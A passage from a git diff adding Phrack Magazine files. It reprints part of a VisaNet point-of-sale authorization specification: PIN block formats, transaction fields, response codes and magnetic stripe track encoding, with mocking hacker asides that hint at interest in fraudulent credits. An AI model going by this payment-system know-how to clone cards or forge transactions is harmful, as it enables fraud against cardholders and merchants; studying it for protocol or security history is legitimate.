+codes shown in Table 4.16 indicates the type of data in this field.  Table
+4.20 provides a brief summary of the current formats.
+
+                                   TABLE 4.20
+                   Cardholder Identification Data Definitions
+
+CARDHOLDER                                                       VALUE(S) FROM
+ID LENGTH     DESCRIPTION                                          TABLE 4.16
+--------------------------------------------------------------------------------
+   0          Signature ID used, No PIN pad is present             @,C,D or E
+   0          Signature ID used on a terminal with a PIN pad           Z
+  23          A PIN was entered on a STATIC key PIN pad                A
+  32          A PIN was entered on a STATIC key PIN pad                B
+  32          A PIN was entered on a DUK/PT key PIN pad                K
+  32          A PIN was entered on a STATIC key PIN pad                S
+0 to 29       AVS was requested                                        N
+--------------------------------------------------------------------------------
+
+4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID
+
+NOTE: The 23 byte static key technology is NOT approved for use in terminals
+deployed in the Visa U.S.A. region.  [thanks nsa!]
+
+When a PIN is entered on a PIN pad supporting 23 byte static key technology, the
+terminal will generate the following data:
+
+   1JFxxyyaaaaaaaaaaaaaaaa
+
+   Where:
+        1J   Header - PIN was entered
+
+        f    Function Key Indicator - A single byte indicating which, if any,
+             function key was pressed on the PIN pad.  This field is currently
+             not edited.  Any printable character is allowed.
+
+        xx   PIN Block Format - These two numeric bytes indicate the PIN
+             encryption method used to create the encrypted PIN block.  Visa
+             currently supports four methods; 01, 02, 03, & 04.  For more
+             information, please refer to the VisaNet Standards Manual, Card
+             Technology Standards, PIN and Security Standards, Section 2,
+             Chapter 3, PIN Block Formats
+
+        aaaaaaaaaaaaaaaa   Expanded Encrypted PIN Block Data - The encrypted
+             PIN block format consists of 64 bits of data.  Since the VisaNet
+             Second Generation protocol allows only printable characters in
+             data fields, these 64 bits must be expanded to ensure that no
+             values less than hex "20" are transmitted.  To expand the 64 bit
+             encrypted PIN block, remove four bits at a time and convert them
+             to ANSI X3.4 characters using Table 4.20.  After this conversion,
+             the 64 bit encrypted PIN block will consist of 16 characters that
+             will be placed in the Expanded Encrypted PIN Block Data field.
+
+4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID
+
+When a PIN is entered on a PIN pad supporting 32 byte static key technology,
+the terminal will generate the following data:
+
+       aaaaaaaaaaaaaaaa2001ppzz00000000
+
+      Where:
+         aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
+              PIN block format consists of 64 bits of data.  Since the
+              VisaNet Second Generation protocol allows only printable
+              characters in data fields, these 64 bits must be expanded to
+              ensure that no values less than hex "20" are transmitted.  To
+              expand the 64 bit encrypted PIN block, remove four bits at a
+              time and convert them to ANSI X3.4 characters using table 4.20.
+              After this conversion, the 64 bit encrypted PIN block will
+              consist of 16 characters that will be placed in the Expanded
+              Encrypted PIN Block Data field.
+
+         20 - Security Format Code - This code defines that the Zone
+              Encryption security technique was used.
+
+         01 - PIN Encryption Algorithm Identifier - This code defines that the
+              ANSI DES encryption technique was used.
+
+         pp - PIN Block Format Code - This code describes the PIN block format
+              was used by the acquirer.  Values are:
+                 01 - Format is based on the PIN, the PIN length, selected
+                      rightmost digits of the account number and the pad
+                      characters "0" and "F"; combined through an exclusive
+                      "OR" operation.
+                 02 - Format is based on the PIN, the PIN length and a user
+                      specified numeric pad character.
+                 03 - Format is based on the PIN and the "F" pad character.
+                 04 - Format is the same as "01" except that the leftmost
+                      account number digits are selected.
+
+         zz - Zone Key Index - This index points to the zone key used by the
+              acquirer to encrypt the PIN block.  Values are:
+                 01 - First key
+                 02 - Second key
+
+         00000000 - Visa Reserved - Must be all zeros
+
+For additional information, refer to the VisaNet manual V.I.P. System, Message
+Formats, Section B: Field Descriptions.  Specifically, fields 52 and 53;
+Personal Identification Number (PIN) Data and Security Related Control
+Information respectively.
+
+4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID
+
+When a PIN is entered on a PIN pad supporting DUK/PT technology, the terminal
+will generate the following 32 bytes:
+
+     aaaaaaaaaaaaaaaakkkkkkssssssssss
+
+     Where:
+         aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
+              PIN block format consists of 64 bits of data.  Since the
+              VisaNet Second Generation protocol allows only printable
+              characters in data fields, these 64 bits must be expanded to
+              ensure that no values less than hex "20" are transmitted.  To
+              expand the 64 bit encrypted PIN block, remove four bits at a
+              time and convert them to ANSI X3.4 characters using table 4.20.
+              After this conversion, the 64 bit encrypted PIN block will
+              consist of 16 characters that will be placed in the Expanded
+              Encrypted PIN Block Data field.  [repetitive? you bet]
+
+         kkkkkk - Key Set Identifier (KSID) - Is represented by a unique, Visa
+              Visa assigned, six digit bank identification number.
+
+         ssssssssss - Expanded TRSM ID (PIN Pad Serial Number) & Expanded
+              Transaction Counter - Is represented by the concatenation of these
+              two hexadecimal fields.  The PIN pad serial number is stored as
+              five hex digits minus one bit for a total of 19 bits of data.  The
+              transaction counter is stored as five hex digits plus one bit for
+              a total of 21 bits of data.  These two fields concatenated
+              together will contain 40 bits.  Since the VisaNet Second
+              Generation protocol allows only printable characters in data
+              fields, these 40 bits must be expanded to ensure that no values
+              less than hex "20" are transmitted.  To expand this 40 bit field,
+              remove four bits at a time and convert them to ASCII characters
+              using table 4.20.  After this conversion, this 40 bit field will
+              consist of 10 characters that will be placed in the Expanded
+              TRSM ID & Expanded Transaction Counter Field.
+
+                                   TABLE 4.20
+                           PIN Block conversion Table
+
+                       HEXADECIMAL   |    ANSI X3.4
+                          DATA       |    CHARACTER
+                       --------------+----------------
+                          0000       |        0
+                          0001       |        1
+                          0010       |        2
+                          0011       |        3
+                          0100       |        4
+                          0101       |        5
+                          0110       |        6
+                          0111       |        7
+                          1000       |        8
+                          1001       |        9
+                          1010       |        A
+                          1011       |        B
+                          1100       |        C
+                          1101       |        D
+                          1110       |        E
+                          1111       |        F
+                       -------------------------------
+
+4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [ah enlightenment]
+
+When Address Verification Service is requested, this field will contain the
+mailing address of the cardholder's monthly statement.  The format of this
+field is:
+                      <street address><apt no.><zip code>
+                                       or
+                       <post office box number><zipcode>
+
+Numbers are not spelled out.  ("First Street" becomes "1ST Street", "Second"
+becomes "2ND", etc)  "Spaces" are only required between a numeral and the ZIP
+code.  For instance:
+                             1391 ELM STREET 40404
+     is equivalent to:       1931ELMSTREET40404
+
+                             P.O. Box 24356 55555
+     is not equivalent to    P.O.BOX2435655555
+
+If a field is not available or not applicable, it may be skipped.  If nine
+digits are available, the last five digits should always be used to pour more
+sand into the wheels of progress.
+
+4.21 FIELD SEPARATOR
+
+The authorization record format specifies the use of the "FS" character.
diff --git a/phrack46/16.txt b/phrack46/16.txt
new file mode 100644
index 0000000..e8d0422
--- /dev/null
+++ b/phrack46/16.txt
@@ -0,0 +1,944 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 16 of 28
+
+****************************************************************************
+
+                        VisaNet Operations (Continued)
+
+4.22 TRANSACTION AMOUNT
+
+This is a variable field from three to twelve digits in length.  The transaction
+amount includes the amount in 4.28, Secondary Amount.  Therefore, field 4.22
+must be greater than or equal to field 4.28.
+
+The transaction amount is presented by the terminal with an implied decimal
+point.  For example $.01 would be represented in the record as "001".  When the
+terminal is used with an authorization system which supports the US dollar as
+the primary currency, the amount field must be limited to seven digits
+(9999999). [...]  The terminal may be used with authorization system which
+support other currencies that require the full twelve-digit field.
+
+4.23 FIELD SEPARATOR
+
+The authorization record format specifies the use of the "FS" character.
+
+4.24 DEVICE CODE/INDUSTRY CODE
+
+This field is used to identify the device type which generated the transaction
+and the industry type of the merchant.  Table 4.24 provides a brief summary of
+the current codes.
+
+                                   TABLE 4.24
+                           Device Code/Industry Code
+
+C                                      C
+O                                      O
+D                                      D
+E          DEVICE TYPE                 E            INDUSTRY TYPE
+-------------------------------------------------------------------------------
+0   Unknown or Unsure                  0   Unknown or Unsure
+1          RESERVED                    1              RESERVED
+2          RESERVED                    2              RESERVED
+3          RESERVED                    3              RESERVED
+4          RESERVED                    4              RESERVED
+5          RESERVED                    5              RESERVED
+6          RESERVED                    6              RESERVED
+7          RESERVED                    7              RESERVED
+8          RESERVED                    8              RESERVED
+9          RESERVED                    9              RESERVED
+A          RESERVED                    A              RESERVED
+B          RESERVED                    B   Bank/Financial Institution
+C   P.C.                               C              RESERVED
+D   Dial Terminal                      D              RESERVED
+E   Electronic Cash Register (ECR)     E              RESERVED
+F          RESERVED                    F   Food/Restaurant
+G          RESERVED                    G   Grocery Store/Supermarket
+H          RESERVED                    H   Hotel
+I   In-Store Processor                 I              RESERVED
+J          RESERVED                    J              RESERVED
+K          RESERVED                    K              RESERVED
+L          RESERVED                    L              RESERVED
+M   Main Frame                         M   Mail Order
+N          RESERVED                    N              RESERVED
+O          RESERVED                    O              RESERVED
+P   POS-port                           P              RESERVED
+Q       RESERVED for POS-port          Q              RESERVED
+R          RESERVED                    R   Retail
+S          RESERVED                    S              RESERVED
+T          RESERVED                    T              RESERVED
+U          RESERVED                    U              RESERVED
+V          RESERVED                    V              RESERVED
+W          RESERVED                    W              RESERVED
+X          RESERVED                    X              RESERVED
+Y          RESERVED                    Y              RESERVED
+Z          RESERVED                    Z              RESERVED
+--------------------------------------------------------------------------------
+
+4.25 FIELD SEPARATOR
+
+The authorization record format specifies the use of the "FS" character.
+
+4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID
+
+This six-digit field is provided by the merchant signing member and is present
+when the terminal is used to process transactions which can not be routed using
+the cardholder Primary Account Number.  When a value is present in this field,
+it is used as an RIID for all valid transaction codes, field 4.12, except 81
+through 88.  This field is used as an IIID for transaction codes 81 through 88.
+Table 4.26 provides a summary of the RIID codes for check acceptance.
+
+                                   TABLE 4.26
+                          Check Acceptance RIID Values
+
+                         Vendor                 RIID
+                         ---------------------------
+                         JBS, Inc             810000
+                         Telecheck            861400
+                         TeleCredit, West     894300 [note; telecredit has been
+                         TeleCredit, East     894400  mutated/eaten by equifax]
+                         ---------------------------
+
+4.27 FIELD SEPARATOR
+
+The authorization record format specifies the use of the "FS" character.
+
+4.28 SECONDARY AMOUNT (CASHBACK)
+
+NOTE: "Cashback" is NOT allowed on Visa cards when the Customer Data Field,
+see section 4.18, has been manually entered.
+
+This is a variable length field from three to twelve digits in length.  The
+Secondary Amount is included in field 4.22, Transaction Amount.
+
+The secondary amount is presented by the terminal with an implied decimal point.
+For example $.01 would be represented in the record as "001".  This field will
+contain 000 when no secondary amount has been requested.  Therefore, when the
+terminal is used with an authorization system which supports the US dollar as
+the primary currency, the secondary amount field must be limited to seven
+digits (9999999).  The terminal may be used with authorization systems which
+support other currencies that require the full twelve-digit field.
+
+4.29 FIELD SEPARATOR
+
+The authorization record format specifies the use of the "FS" character.
+
+4.30 MERCHANT NAME
+
+This 25-character field contains the merchant name provided by the signing
+member.  the name must correspond to the name printed on the customer receipt.
+The name is left justified with space fill.  The first character position can
+not be a space.  This field must contain the same used in the data capture
+batch.
+
+4.32 MERCHANT STATE
+
+This two-character field contains the merchant location state abbreviation
+provided by the singing member.  The abbreviation must correspond to the state
+name printed on the customer receipt and be one of the Visa accepted
+abbreviations.  This field must contain the same data used in the data capture
+batch.
+
+4.33 SHARING GROUP
+
+This one to fourteen-character field contains the group of debit card/network
+types that a terminal may have access to and is provided by the singing member.
+The values must correspond to one of the Visa assigned debit card /network
+types.  This data is part of the VisaNet debit data.
+
+4.34 FIELD SEPARATOR
+
+The authorization record format specifies the use of the "FS" character.
+
+4.35 MERCHANT ABA NUMBER
+
+This fixed length field is twelve digits in length.  If this field is not used,
+its length must be zero.  If this field is not used, the following field must
+also be empty.
+
+This number identifies the merchant to a debit switch provided by the signing
+member.  The number is provided by the signing member.
+
+4.36 MERCHANT SETTLEMENT AGENT NUMBER
+
+This fixed length field is four digits in length.  If this field is not used,
+its length must be zero.  If this field is not used, the previous field must
+also be empty.
+
+This number identifies the merchant settling agent.  The number is provided by
+the signing member.
+
+4.37 FIELD SEPARATOR
+
+The authorization record format specifies the use of the "FS" character.
+
+4.38 AGENT NUMBER
+
+This six-digit field contains an agent number assigned by the signing member.
+The number identifies an institution which signs merchants as an agent of a
+member.  The member uses this number to identify the agent within the member
+systems.  The acquirer BIN, Agent, Chain, Merchant, Store, and Terminal numbers
+are required to uniquely identify a terminal within the VisaNet systems.
+
+4.39 CHAIN NUMBER
+
+This six-digit field contains a merchant chain identification number assigned
+by the singing member.  The member uses this number to identify the merchant
+chain within the member systems.  The acquirer BIN, Agent, Chain, Merchant,
+Store, and Terminal numbers are required to uniquely identify a terminal within
+the VisaNet systems.
+
+4.40 BATCH NUMBER
+
+This three-digit field contains a batch sequence number generated by the
+terminal.  The number will wrap from 999 to 001.  This number is that data
+capture batch number.
+
+4.41 REIMBURSEMENT ATTRIBUTE
+
+This is a single character fixed length field.
+
+This field contains the reimbursement attribute assigned by the singing member.
+This field must be a "space".
+
+4.42 FIELD SEPARATOR
+
+The authorization record format specifies the use of the "FS" character.
+
+4.43 APPROVAL CODE
+
+This contains a six-character fixed length field.
+
+This field is only present in cancel transactions and contains the original
+approval code from the original transaction.
+
+The approval code was returned in the authorization response of the transaction
+to be canceled.
+
+4.44 SETTLEMENT DATE
+
+This contains a four-digit fixed length field.
+
+This field is only present in cancel transactions and contains the settlement
+date from the original transaction and is in the format MMDD.
+
+The settlement date was returned in the authorization response of the
+transaction to be canceled.
+
+4.45 LOCAL TRANSACTION DATE
+
+This contains a four-digit fixed length field.
+
+This field is only present in cancel transactions and contains the transaction
+date from the original transaction and is in the format MMDD.
+
+The transaction date was returned in the authorization response of the
+transaction to be canceled as MMDDYY.
+
+4.46 LOCAL TRANSACTION TIME
+
+This contains a six-digit fixed length field.
+
+This field is only present in cancel transactions and contains the transaction
+time from the original transaction and is in the format HHMMSS.
+
+The transaction time was returned in the authorization response of the
+transaction to be canceled.
+
+4.47 SYSTEM TRACE AUDIT NUMBER
+
+This contains a six-character fixed length field.
+
+This field is only present in cancel transactions and contains the trace audit
+number from the original transaction.
+
+The trace audit number was returned in the authorization response of the
+transaction to be canceled.
+
+4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE
+
+The field is a two-character fixed length field and must contain the original
+AUTHORIZATION TRANSACTION CODE (filed 4.12) of the transaction to be canceled.
+Currently, the only transaction that can be canceled in an Interlink Debit
+Purchase.
+
+4.49 NETWORK IDENTIFICATION CODE
+
+This contains a single character fixed length field.
+
+This field is only present in cancel transactions and contains the network ID
+from the original transaction.
+
+The network ID was returned in the authorization response of the transaction to
+be canceled.
+
+4.50 FIELD SEPARATOR
+
+The authorization record format specifies the use of the "FS" character.
+
+5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS
+
+The following subsections will define the authorization response record data
+elements.
+
+5.01 PAYMENT SERVICE INDICATOR
+
+This field contains the one-character payment service indicator.  It must be
+placed in the batch detail record for terminals that capture.
+
+Table 5.01 provides a summary of current Values.
+
+                                   TABLE 5.01
+                        Payment Service Indicator Values
+
+        VALUE   DESCRIPTION
+        ------------------------------------------------------------------
+          A     REPS qualified
+          Y     Requested a "Y" in field 4.14 and there was a problem
+                REPS denied (VAS edit error or BASE I reject)
+          N     Requested an "N" in field 4.14 or requested a "Y" in field
+                4.14 and request was downgraded (by VAS)
+        space   If "Y" sent and transaction not qualified  (VAS downgrade)
+        -------------------------------------------------------------------
+
+5.02 STORE NUMBER
+
+This four-digit number is returned by VisaNet from the authorization request for
+formats "J" and "G", and can be used to route the response within a store
+controller and/or a store concentrator.
+
+5.03 TERMINAL NUMBER
+
+This four-digit number is returned by VisaNet from the authorization request for
+formats "J" and "G", and can be used to route the response within a store
+controller and/or a store concentrator.
+
+5.04 AUTHORIZATION SOURCE CODE
+
+This field contains a one-character code that indicates the source of the
+authorization.  The received code must be placed in the data capture detail
+transaction record when data capture is enabled.
+
+Table 5.04 provides a summary of current codes.
+
+                                   TABLE 5.04
+                           Authorization Source Codes
+
+ Code   Description
+--------------------------------------------------------------------------------
+  1     STIP: time-out response
+  2     LCS: amount below issuer limit
+  3     STIP: issuer in Suppress-Inquiry mode
+  4     STIP: issuer unavailable
+  5     Issuer approval
+  6     Off-line approval, POS device generated
+  7     Acquirer approval: BASE I unavailable
+  8     Acquirer approval of a referral
+  9     Use for non-authorized transactions; such as credit card credits [yum!]
+  D     Referral: authorization code manually keyed
+  E     Off-line approval: authorization code manually keyed
+--------------------------------------------------------------------------------
+
+5.05 TRANSACTION SEQUENCE NUMBER
+
+This field contains the four-digit code which was generated by the terminal as
+the sequence number for the transaction and passed to the authorization center
+in the authorization request record.  The sequence number can be used by the
+terminal to match request and response messages.  The transaction sequence
+number is returned by VisaNet without sequence verification.
+
+5.06 RESPONSE CODE
+
+This field contains a two-character response code indicating the status of the
+authorization.
+
+Table 5.06 provides the response codes for formats "J" and "G".  A response code
+of "00" represents an approval.  A response code of "85" represents a successful
+card verification returned by TRANSACTION CODES 58, 68, and 88.  All other
+response codes represent a non-approved request.
+
+The value returned is stored in the batch transaction detail record for
+terminals that capture.
+
+                                   TABLE 5.06
+           Authorization Response Codes For Record Formats "J" & "G"
+
+  Authorization     Response                                        AVS Result
+ Response Message     Code       Response Definition                   Code
+--------------------------------------------------------------------------------
+   EXACT MATCH         00        Exact Match, 9 digit zip               X
+   EXACT MATCH         00        Exact Match, 5 digit zip GRIND         Y
+  ADDRESS MATCH        00        Address match only                     A
+    ZIP MATCH          00        9-digit zip match only                 W
+    ZIP MATCH          00        5-digit zip match only GRIND           Z
+     NO MATCH          00        No address or zip match                N
+ VER UNAVAILABLE       00        Address unavailable                    U
+      RETRY            00        Issuer system unavailable              R
+ ERROR INELIGIBLE      00        Not a mail/phone order                 E
+ SERV UNAVAILABLE      00        Service not supported                  S
+    APPROVAL           00        Approved and completed              see above
+     CARD OK           85        No reason to decline                see above
+      CALL             01        Refer to issuer                        0
+      CALL             02        Refer to issue - Special condition     0
+    NO REPLY           28        File is temporarily unavailable        0
+    NO REPLY           91        Issuer or switch is unavailable        0
+    HOLD-CALL          04        Pick up card                           0
+    HOLD-CALL          07        Pick up card - Special condition       0
+    HOLD-CALL          41        Pick up card - Lost                    0
+    HOLD-CALL          43        Pick up card - Stolen                  0
+ ACCT LENGTH ERR       EA        Verification Error                     0
+ ALREADY REVERSED      79        Already Reversed at Switch [ya got me] 0
+   AMOUNT ERROR        13        Invalid amount                         0
+  CAN'T VERIFY PIN     83        Can not verify PIN                     0
+   CARD NO ERROR       14        Invalid card number                    0
+  CASHBACK NOT APP     82        Cashback amount not approved           0
+   CHECK DIGIT ERR     EB        Verification Error                     0
+  CID FORMAT ERROR     EC        Verification Error                     0
+     DATE ERROR        80        Invalid Date                           0
+      DECLINE          05        Do not honor                           0
+      DECLINE          51        Not Sufficient Funds                   0
+      DECLINE          61        Exceeds Withdrawal Limit               0
+      DECLINE          65        Activity Limit Exceeded                0
+ ENCRYPTION ERROR      81        Cryptographic Error                    0
+      ERROR xx         06        General Error                          0
+     ERROR xxxx        06        General Error                          0
+    EXPIRED CARD       54        Expired Card                           0
+  INVALID ROUTING      98        Destination Not Found                  0
+   INVALID TRANS       12        Invalid Transaction                    0
+  NO CHECK ACCOUNT     52        No Check Account                       0
+  NO SAVE ACCOUNT      54        No Save Account                        0
+   NO SUCH ISSUER      15        No Such Issuer                         0
+      RE ENTER         19        Re-enter Transaction                   0
+    SEC VIOLATION      63        Security Violation                     0
+   SERV NOT ALLOWED    57        Trans. not permitted-Card              0
+   SERV NOT ALLOWED    58        Trans. not permitted-Terminal          0
+   SERVICE CODE ERR    62        Restricted Card                        0
+     SYSTEM ERROR      96        System Malfunction [whoop whoop!]      0
+     TERM ID ERROR     03        Invalid Merchant ID                    0
+      WRONG PIN        55        Incorrect PIN                          0
+  xxxxxxxxxxxxxxxxxx   xx        Undefined Response                     0
+--------------------------------------------------------------------------------
+
+5.07 APPROVAL CODE
+
+This field contains a six-character code when a transaction has been approved.
+If the transaction is not approved the contents of the field should be ignored.
+The approval code is input to the data capture detail transaction record.
+
+5.08 LOCAL TRANSACTION DATE
+
+This field contains a six-digit local date calculated (MMDDYY) by the
+authorization center using the time zone differential code provided in the
+authorization request message.  This date is used by the terminal as the date to
+be printed on the transaction receipts and audit reports, and as the date input
+to the data capture transaction detail record.  This field is only valid for
+approved transactions.
+
+5.09 AUTHORIZATION RESPONSE MESSAGE
+
+This field is a sixteen-character field containing a response display message.
+This message is used by the terminal to display the authorization results.
+Table 5.06 provides the message summary.   The messages are provided with "sp"
+space fill.  This field is mapped to the RESPONSE CODE, field 5.06, for all
+non-AVS transactions and for all DECLINED AVS transactions.  For APPROVED AVS
+transactions (response code = "00" or "85"), it is mapped to the AVS RESULT
+CODE, field 5.10.
+
+5.10 AVS RESULT CODE
+
+This one-character field contains the address verification result code.  An
+address verification result code is provided for transactions and provides an
+additional indication that the card is being used by the person to which the
+card was issued.  The service is only available for mail/phone order
+transactions.
+
+Table 5.06 provides a summary of the AVS Result Codes.
+
+An ANSI X3.4 "0" is provided for all non-AVS transactions and all declined
+transactions.
+
+5.11 TRANSACTION IDENTIFIER
+
+This numeric field will contain a transaction identifier.  The identifier will
+be fifteen-digits in length if the payment service indicator value is an "A" or
+it will be zero in length if the payment service indicator value is not an "A".
+This value is stored in the batch detail record for terminals that capture and
+is mandatory for REPS qualification.
+
+5.12 FIELD SEPARATOR
+
+The authorization record format specifies the use of the "FS" character.
+
+5.13 VALIDATION CODE
+
+This alphanumeric field will contain a validation code.  The code will contain a
+four-character value if the payment service indicator value is an "A" or it will
+be zero in length if the payment service indicator value is not an "A".  This
+value is stored in the batch detail record for terminals that capture and is
+mandatory for REPS qualification.
+
+5.14 FIELD SEPARATOR
+
+The authorization record format specifies the use of the "FS" character.
+
+5.15 NETWORK IDENTIFICATION CODE
+
+This one-character fixed length field contains the identification code of the
+network on which the transaction was authorized.  The network ID must be printed
+on the receipt.
+
+5.16 SETTLEMENT DATE
+
+This four-digit fixed length field contains the transaction settlement date
+returned by the authorizing system (MMDD).  The settlement date must be printed
+on the receipt.
+
+5.17 SYSTEM TRACE AUDIT NUMBER
+
+This six-character fixed length field contains a trace audit number which is
+assigned by the authorizing system.  The trace audit number must be printed on
+the receipt.
+
+5.18 RETRIEVAL REFERENCE NUMBER
+
+This twelve-character fixed length field contains the transaction retrieval
+reference number returned by the authorizing system.  The reference number
+should be printed on the receipt.
+
+5.19 LOCAL TRANSACTION TIME
+
+This six-digit fixed length field contains the transaction time returned by the
+authorizing system (HHMMSS).  The time must be printed on the receipt.
+
+6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS
+
+The following subsections define the debit confirmation response record data
+elements.
+
+6.01 NETWORK IDENTIFICATION CODE
+
+This one character fixed length field contains the identification code of the
+network on which the transaction was authorized.  The network ID is printed on
+the receipt.
+
+6.02 SETTLEMENT DATE
+
+This four-digit fixed length field contains the transaction settlement date
+returned by the authorizing system.
+
+6.03 SYSTEM TRACE AUDIT NUMBER
+
+This six-character fixed length field contains the system trace audit number
+which is assigned by the authorizing system.
+
+7.0 CHARACTER CODE DEFINITIONS
+
+The following subsections will define the authorization request record character
+set and character sets used for track 1 and track 2 data encoded on the magnetic
+stripes.
+
+The authorization request records are generated with characters defined by ANSI
+X3.4-1986.  The data stored on the cardholder's card in magnetic or optical form
+must be converted to the ANSI X3.4 character set before transmission to VisaNet.
+
+Section 7.01 provides track 1 character set definition.  Section 7.02 provides
+track 2 character set definition.  Section 7.03 provides the ANSI X3.4-1986 and
+ISO 646 character set definitions.  Section 7.04 provides a cross reference
+between the track 1, track 2, and ANSI X3.4 character sets.  Section 7.05
+describes the method for generating and checking the Mod 10 Luhn check digit for
+credit card account numbers.  Section 7.06 describes the method for generating
+the LRC byte for the authorization request message and for testing the card
+swipe's LRC byte.  Section 7.07 provides sample data for an authorization
+request and response for record format "J" testing.
+
+The POS device/authorization must perform the following operations on track
+read data before it can be used in an authorization request message.
+
+   1. The LRC must be calculated for the data read from the track and compared
+      to the LRC read from the track.  The track data is assumed to be read
+      without errors when on character parity errors are detected and the
+      calculated and read LRC's match.
+
+   2. The starting sentinel, ending sentinel, and LRC are discarded.
+
+   3. The character codes read from the magnetic stripe must be converted from
+      the encoded character set to the set used for the authorization request
+      message.  The characters encoded on track 1 are six-bit plus parity codes
+      and the characters encoded on track 2 are four-bit plus parity codes, with
+      the character set used for the request message defined as seven-bit plus
+      parity codes.
+
+All characters read from a track must be converted to the request message
+character set and transmitted as part of the request.  The converted track data
+can not be modified by adding or deleting non-framing characters and must be a
+one-for-one representation of the characters read from the track.  [sounds like
+they mean it, eh?]
+
+7.1 TRACK 1 CHARACTER DEFINITION
+
+Table 7.01 provides the ISO 7811-2 track 1 character encoding definitions.  This
+"standards" format is a SAMPLE guideline for expected credit card track
+encoding; ATM/debit cards may differ.  Actual cards may differ [not], whether
+they are Visa cards or any other issuer's cards.
+
+Each character is defined by the six-bit codes listed in Table 7.01.
+
+Track 1 can be encoded with up to 79 characters as shown in Figure 7.01
+
++---------------------------------------------------------+
+|SS|FC| PAN|FS|  NAME|FS| DATE| DISCRETIONARY DATA |ES|LRC|
++---------------------------------------------------------+
+
+LEGEND:
+
+             Field  Description                                  Length  Format
+--------------------------------------------------------------------------------
+                SS  Start Sentinel                                 1        %
+                FC  Format Code ("B" for credit cards)             1       A/N
+               PAN  Primary Account Number                      19 max     NUM
+                FS  Field Separator                                1        ^
+              NAME  Card Holder Name (See NOTE below)           26 max     A/N
+                FS  Field Separator                                1        ^
+              DATE  Expiration Date (YYMM)                         4       NUM
+Discretionary Data  Option Issuer Data (See NOTE below)         variable   A/N
+                ES  End Sentinel                                   1        ?
+               LRC  Longitudinal Redundancy Check                  1
+                                                                  ---
+                    Total CAN NOT exceed 79 bytes----->           79
+--------------------------------------------------------------------------------
+
+                                  FIGURE 7.01
+                          Track 1 Encoding Definition
+
+NOTE: The CARD HOLDER NAME field can include a "/" as the surname separator
+      and a "." as the title separator
+
+      The DISCRETIONARY DATA can contain any of the printable characters from
+      Table 7.01
+
+                                   TABLE 7.01
+                          Track 1 Character Definition
+
+                       b6   0   0   1   1
+BIT NUMBER             b5   0   1   0   1      (a) These character positions
+-------------------------------------------        are for hardware use only
+b4 b3 b2 b1    ROW/COL      0   1   2   3
+-------------------------------------------    (b) These characters are for
+0  0  0  0        0        SP   0  (a)  P          country use only, not for
+0  0  0  1        1        (a)  1   A   Q          international use
+0  0  1  0        2        (a)  2   B   R
+0  0  1  1        3        (c)  3   C   S      (c) These characters are
+0  1  0  0        4         $   4   D   T          reserved for added
+0  1  0  1        5        (%)  5   E   U          graphic use [nifty]
+0  1  1  0        6        (a)  6   F   V
+0  1  1  1        7        (a)  7   G   W
+1  0  0  0        8         (   8   H   X      (%) Start sentinel
+1  0  0  1        9         )   9   I   Y      (/) End sentinel
+1  0  1  0        A        (a) (a)  J   Z      (^) Field Separator
+1  0  1  1        B        (a) (a)  K  (b)      /  Surname separator
+1  1  0  0        C        (a) (a)  L  (b)      .  Title separator
+1  1  0  1        D         -  (a)  M  (b)      SP Space
+1  1  1  0        E         -  (a)  N  (^)      +-----------------------+
+1  1  1  1        F         /  (?)  O  (a)      |PAR|MSB|B5|B4|B3|B2|LSB|
+                                                +-+---+-----------------+
+                                                  |   |--- Most Significant Bit
+                                                  |--- Parity Bit (ODD)
+                                               Read LSB First
+
+7.02 TRACK 2 CHARACTER DEFINITION
+
+Table 7.02 provides the ISO 7811-2 track 2 character encoding definitions.  This
+"standards" format is a SAMPLE guideline for expected credit card track
+encoding; ATM/debit cards may differ.  Actual cards may differ, whether they are
+Visa cards or any other issuer's cards.
+
+Each character is defined by the four-bit codes listed in Table 7.02.
+
+Track 2 can be encoded with up to 40 characters as shown in Figure 7.02.
+
++--------------------------------------------------------+
+|SS|    PAN   |FS| DATE|    DISCRETIONARY DATA    |ES|LRC|
++--------------------------------------------------------+
+
+LEGEND:
+
+             Field  Description                                  Length  Format
+--------------------------------------------------------------------------------
+                SS  Start Sentinel                                 1     0B hex
+               PAN  Primary Account Number                      19 max     NUM
+                FS  Field Separator                                1        =
+Discretionary Data  Option Issuer Data (See NOTE below)         variable   A/N
+                ES  End Sentinel                                   1     0F hex
+               LRC  Longitudinal Redundancy Check                  1
+                                                                  ---
+                    Total CAN NOT exceed 40 bytes----->           40
+--------------------------------------------------------------------------------
+
+                                  FIGURE 7.02
+                          Track 2 Encoding Definition
+
+NOTE: The PAN and DATE are always numeric.  The DISCRETIONARY DATA can be
+      numeric with optional field separators as specified in Table 7.02.
+
+
+                                   TABLE 7.02
+                             Track 2 Character Set
+
+b4  b3  b2  b1     COL              (a) These characters are for
+------------------------------          hardware use only
+0   0   0   0       0      0
+0   0   0   1       1      1        (B) Starting Sentinel
+0   0   1   0       2      2
+0   0   1   1       3      3        (D) Field Separator
+0   1   0   0       4      4
+0   1   0   1       5      5        (F) Ending Sentinel
+0   1   1   0       6      6
+0   1   1   1       7      7
+1   0   0   0       8      8        +---------------------------+
+1   0   0   1       9      9        | PAR | MSB | b3 | b2 | LSB |
+1   0   1   0       A     (a)       +---------------------------+
+1   0   1   1       B     (B)          |     |
+1   1   0   0       C     (a)          |     |--- Most Significant Bit
+1   1   0   1       D     (D)          |--- Parity Bit (ODD)
+1   1   1   0       E     (a)
+1   1   1   1       F     (F)        Read LSB first
+
+[ tables 7.03a, 7.03b, and 7.04 deleted...
+  If you really need a fucking ascii table that bad go buy a book.]
+
+[ section 7.05 - Account Data Luhn Check deleted...
+  as being unnecessary obtuse and roundabout in explaining how the check works.
+  the routine written by crazed luddite and murdering thug is much clearer. ]
+
+7.06 CALCULATING AN LRC
+
+When creating or testing the LRC for the read of the card swipe, the
+authorization request record, the debit confirmation record or the VisaNet
+response record; use the following steps to calculate the LRC:
+
